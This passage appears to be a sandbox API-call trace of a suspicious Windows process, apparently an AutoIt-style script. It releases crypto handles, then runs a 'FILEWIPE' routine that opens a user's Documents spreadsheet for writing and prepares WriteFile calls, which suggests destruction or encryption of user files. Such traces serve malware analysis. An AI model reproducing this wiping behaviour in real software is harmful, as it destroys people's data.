wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0036.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.861] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0036.862] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.862] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.862] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.862] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.862] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.862] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.862] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.862] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0036.862] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.862] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.862] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.862] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.863] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.863] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.863] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.863] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.863] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.863] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.863] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.863] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.864] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0036.864] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.864] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.864] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.864] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0036.864] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.864] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.864] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.864] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.864] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.865] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.865] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0036.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.865] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.865] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.865] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6746d0c0, ftCreationTime.dwHighDateTime=0x1d57fb5, ftLastAccessTime.dwLowDateTime=0x573ff8b0, ftLastAccessTime.dwHighDateTime=0x1d5b0bf, ftLastWriteTime.dwLowDateTime=0x573ff8b0, ftLastWriteTime.dwHighDateTime=0x1d5b0bf, nFileSizeHigh=0x0, nFileSizeLow=0x9ed1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pMd_CmUNe5hcq1EzK.xlsx", cAlternateFileName="PMD_CM~1.XLS")) returned 0x7c2240 [0036.865] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.866] CharLowerBuffW (in: lpsz="byte[40657]", cchLength=0xb | out: lpsz="byte[40657]") returned 0xb [0036.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.866] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.866] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.866] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.866] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.866] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.867] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.867] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.867] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.867] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.868] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.868] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pmd_cmune5hcq1ezk.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0036.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0036.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.868] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.869] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.869] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.869] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0036.869] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.869] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.869] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x889dd8 [0036.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x889dd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0036.870] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0036.870] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0036.870] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0036.870] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 